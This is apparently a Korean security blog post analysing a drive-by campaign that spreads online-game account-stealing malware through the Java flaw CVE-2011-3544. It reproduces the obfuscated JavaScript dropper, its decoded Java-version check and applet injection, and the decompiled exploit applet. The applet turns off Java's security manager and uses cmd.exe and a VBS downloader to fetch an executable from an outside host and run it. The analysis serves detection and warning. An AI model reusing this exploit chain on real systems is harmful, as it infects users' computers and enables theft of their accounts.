새롭게 추가된 온라인게임핵 악성코드 전파용 취약점 (CVE-2011-3544)

최근 국내에서 전파되는 온라인게임핵 악성코드와 관련하여 추가된 취약점이 있어 공유합니다.

http://www.yo****ow.com/63/pps.html
L http://www.yo****ow.com/63/jpg.js

이번주부터 추가되어 전파되는 것으로 보이며, CVE-2011-3544 (Oracle Java Applet Rhino Script Engine Remote Code Execution) 취약점으로 Oracle Java SE JDK and JRE 7 and 6 Update 27 이전 버전이면 감염이 됩니다.

http://www.yo****ow.com/63/pps.html 코드를 살펴보면 이전과는 다른점을 확인할 수 있습니다.

<script src=jpg.js></script>
<script>
eHQu5=unescape;IAoO3="033F1B1E20323C544D12ECDCE69B80BAAFA8467F047B2C3BC8DB9BEED4120F6EB092F1D82C135AFFD3AE2D5E09FAA7924E25B2A797614C1CCF8A514FFDAE4400D681681DD3917231DCDA363FC59C624C952F6AB17203A05417B16D2B924210BB6D58B86106B9791BAB4EF89168528E42F072E8996DA33C72F262EE63AE75FE79FC41C7558F68F651C667EA6FD362C229FF55B761926FB205EF29BF2F9111B148BF7AD34EB064FE7DD770DE489344AD03BB5F8D63DD70B30BAC6DB34DBF6FAE05C17CCD6B804DF676F633F832C11DF809BD70C14A67B0419C70963BDE0122C323C53BF81D872D07837D7ED7467B66934478343027985F4E5E474F45591E6175687568406A64714C4A6268052A41726741775E36022F3D1160497A674472264C5375646A5B431D39507B7C7570763A7D6B4704160E06714E436C77412D7749637E0D366C7E44764C73454F63497D686A5964264C497D677E25393D274C45444F4C542C706470684D122A25031401164A624E6676493C42744273586F3A0425211E1B02494E75796E48485435757B76683F7364677E4E426E6B657A45056F794B6775422E203D1E5D7058324A786C446C496D314B4E777D42407260236470554C5F4F6F47485D6769793C3B554E7A754C0825272007476D7949734E60057A5176621B36674462690F1A1B06644248447A73653C67707E617226024E59777C2C0E027F61522D6D497263597A44660471427A2D50644E326957443633222F7B7B63636354034A5A5A4E4354416F6478780D48677A454E686D04362D086A161F20754E78556F62065B6D577D3A16457360665943004B5B7779644563202C7F454A4877693653555F476D4F7B163C7F55784E654F327A656D6C4B1C27684A4D717C4A056E7D4C50310B494E464F5F48104D607540546D1F337044436968482D746167457061781A2F547E6B4360660578626256203767484A456F72347D494641252C7F454A487769364B7C507F113870436B7E44710B66427F417450473F1678694344606D0F75747165605605164F4F464E5955224E4C7B5316146C714D4A78790D65494F6F1A294E744771447E2772446A73703F1645736066594300727D65587A6B242F737E4C4359662C73697C7D231E67714A626F553451426C704363301B694870695B44345C6955747D6E4A360B494E464F5F481073494B674414146C714D4A78790D7C534456492611754E78556F6206667B5159461D1A72696F4852453B5F7854404063232C7F454A4877693666545A45576977153C585F78477449666A7670426C4A7924061A";Onrk2="function PLckuTq4(){GyRSrjc3=Math.tan;rxWQHLo0=Math.PI;WroLF1=parseInt;riAW3='length';rxtON0='test';TFphicM4='replace';OgxTHH0=WroLF1(~((rxWQHLo0&rxWQHLo0)|(~rxWQHLo0&rxWQHLo0)&(rxWQHLo0&~rxWQHLo0)|(~rxWQHLo0&~rxWQHLo0)));TcphbKi1=WroLF1(((OgxTHH0&OgxTHH0)|(~OgxTHH0&OgxTHH0)&(OgxTHH0&~OgxTHH0)|(~OgxTHH0&~OgxTHH0))&1);/*Encrypt By Dadong's JSXX 0.40 VIP*/njOw6=TcphbKi1<<TcphbKi1;new function(){hiMx7=TPiVf7('a1Qe4dG*]6zY^k8b]#&,m8$[x_GD3]Nvj5dsn7[F[8ecu[S34Rlc]4r;iadpDt='[TFphicM4](/[^xS@0ietrc9p]/g,''));};try{if(!\/^\\d*$\/g[rxtON0](oXWS1));}catch(e){oXWS1=OgxTHH0;}jQXi4='';whmlcRg2=eval(eHQu5('%5'+'3%74%'+'72%69%6'+'E%67%2E%'+'66%72%'+'6F%6D%4'+'3%68%61'+'%72%4'+'3%6F%64'+'%65'));for(PhehgT5=OgxTHH0;PhehgT5<Onrk2[riAW3];PhehgT5-=-TcphbKi1)oXWS1+=Onrk2.charCodeAt(PhehgT5);oXWS1%=eHQu5(OgxTHH0+eHQu5('x')+(1<<6)-TcphbKi1);HlFQQq7+=TcphbKi1;for(PhehgT5=OgxTHH0,zSFbnt2=TcphbKi1;PhehgT5<IAoO3[riAW3];PhehgT5+=njOw6,zSFbnt2++,oXWS1=oXWS1+zSFbnt2){if(\/^(\\d{4})\/g[rxtON0](oXWS1+744))oXWS1%=50;jQXi4+=whmlcRg2(WroLF1(OgxTHH0+eHQu5('x')+IAoO3.charAt(PhehgT5)+IAoO3.charAt(PhehgT5+WroLF1(TcphbKi1)))^oXWS1);}try{new function(){hiMx7(jQXi4);}}catch(e){try{new function(){qNFsX1=parseInt;GyRSrjc3(jQXi4);}}catch(e) {window.location='.';}}}try{TPiVf7('PLckuTq4();')}catch(e) {try{HlFQQq7=OgxTHH0;TPiVf7('PLckuTq4();');}catch(e){alert('ere');}}";ijqJkz6 = TPiVf7(TPiVf7);ijqJkz6(Onrk2);
</script>

기존에 악성코드 유포자는 난독화를 한 후 아래와 같은 주석을 남겼습니다.

Encrypt By Dadong's JSXX 버전명 VIP

가장 최근에 확인된 버전은 0.39 였으나 이번에 0.40으로 업데이트 된것을 확인하였습니다.
업데이트가 되긴 했으나 쉽게 디코딩이 가능하며 해당 코드를 디코딩 하면 아래와 같은 코드를 확인할 수 있습니다.

GyRSrjc3 = hiMx7;
qsFAd4 = qNFsX1(20100418);
var gondady = document.createElement('body');
document.body.appendChild(gondady);
var gondadx = deployJava.getJREs() + "";
gondadx = parseInt(gondadx.replace(/\.|\_/g, ''));
if (gondadx <= 16027) {
    var gondad = document.createElement('applet');
    gondad.archive = "Gondad.jpg";
    gondad.code = "GondadGondadExp.class";
    gondad.width = "1";
    gondad.height = "1";
    document.body.appendChild(gondad);
    var gondadq = document.createElement('param');
    gondadq.name = "data";
    gondadq.value = "http://www.yo****ow.com/pic.exe";
    gondad.appendChild(gondadq);
};
delete Onrk2;
delete PLckuTq4;
delete rxWQHLo0;
delete WroLF1;
delete riAW3;
delete OgxTHH0;
delete TcphbKi1;
delete njOw6;
delete oXWS1;
delete jQXi4;
delete whmlcRg2;
delete PhehgT5;
delete IAoO3;
delete hiMx7;
delete TPiVf7;
delete ijqJkz6;
delete eHQu5;
delete zSFbnt2;
delete TFphicM4;
delete qNFsX1;
delete qsFAd4;
delete rxtON0;
delete HlFQQq7;
delete GyRSrjc3;
CollectGarbage();

여기서 Gondad.jpg 파일을 다운로드 받아 보면 jar 파일임을 알 수 있으며 JD-GUI 툴을 이용해 디컴파일 하여 코드 내부를 확인하면 아래와 같습니다.

import java.applet.Applet;
import java.net.InetAddress;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import javax.script.ScriptException;
import javax.swing.JList;

public class GondadGondadExp extends Applet
{
  private JList list;

  public void init()
  {
    try
    {
      ScriptEngine se = new ScriptEngineManager().getEngineByName("js");
      InetAddress address = null;
      InetAddress sun = null;

      String url = getParameter("data");

      se.eval("var error = new Error(\"My error\");this.toString = function(){ java.lang.System.setSecurityManager(null);java.lang.Runtime.getRuntime().exec('cmd.exe /c echo URL = LCase(WScript.Arguments(0))>\"%temp%\\\\down.vbs\"&&cmd.exe /c echo dim m,s>>\"%temp%\\\\down.vbs\"&&cmd.exe /c echo m=\"M^i^c^r^o^s^o^f^t^.^X^M^L^H^T^T^P\">>\"%temp%\\\\down.vbs\"&&cmd.exe /c echo s=\"A=D=O=DB=.=S=t=r=e=a=m\">>\"%temp%\\\\down.vbs\"&&cmd.exe /c echo set cmd =Createobject(replace(m,\"^\",\"\")) >>\"%temp%\\\\down.vbs\"&&cmd.exe /c echo cmd.Open \"GET\",URL,0 >>\"%temp%\\\\down.vbs\"&&cmd.exe /c echo cmd.Send()>>\"%temp%\\\\down.vbs\"&&cmd.exe /c echo FileName=LCase(WScript.Arguments(1))>>\"%temp%\\\\down.vbs\"&&cmd.exe /c echo Set CsCriptGet = Createobject(replace(s,\"=\",\"\"))>>\"%temp%\\\\down.vbs\"&&cmd.exe /c echo CsCriptGet.Mode=^3>>\"%temp%\\\\down.vbs\"&&cmd.exe /c echo CsCriptGet.Type=^1>>\"%temp%\\\\down.vbs\"&&cmd.exe /c echo CsCriptGet.Open()>>\"%temp%\\\\down.vbs\"&&cmd.exe /c echo CsCriptGet.Write(cmd.responseBody)>>\"%temp%\\\\down.vbs\"&&cmd.exe /c echo CsCriptGet.SaveToFile FileName,^2>>\"%temp%\\\\down.vbs\"&&cmd.exe /c cscript \"%temp%\\\\down.vbs\" " +
        url + " \"%temp%\\\\xxoo.exe\"&& \"%temp%\\\\xxoo.exe\"');" +
        "return \"exploit!\";};" +
        "error.message = this;");

      this.list = new JList(new Object[] { se.get("error") });

      add(this.list);
    }
    catch (ScriptException ex)
    {
      ex.printStackTrace();
    }
  }
}

취약점과 관련된 자세한 내용은 아래 페이지를 참고하시면 될거 같습니다.
http://schierlm.users.sourceforge.net/CVE-2011-3544.html

새로운 취약점이 추가된 만큼 이번주에 왠지 많은 감염자가 나올것으로 보이네요. 뭐 평소에도 늘 그랬지만……

답글 남기기

이메일 주소를 발행하지 않을 것입니다. 필수 항목은 *(으)로 표시합니다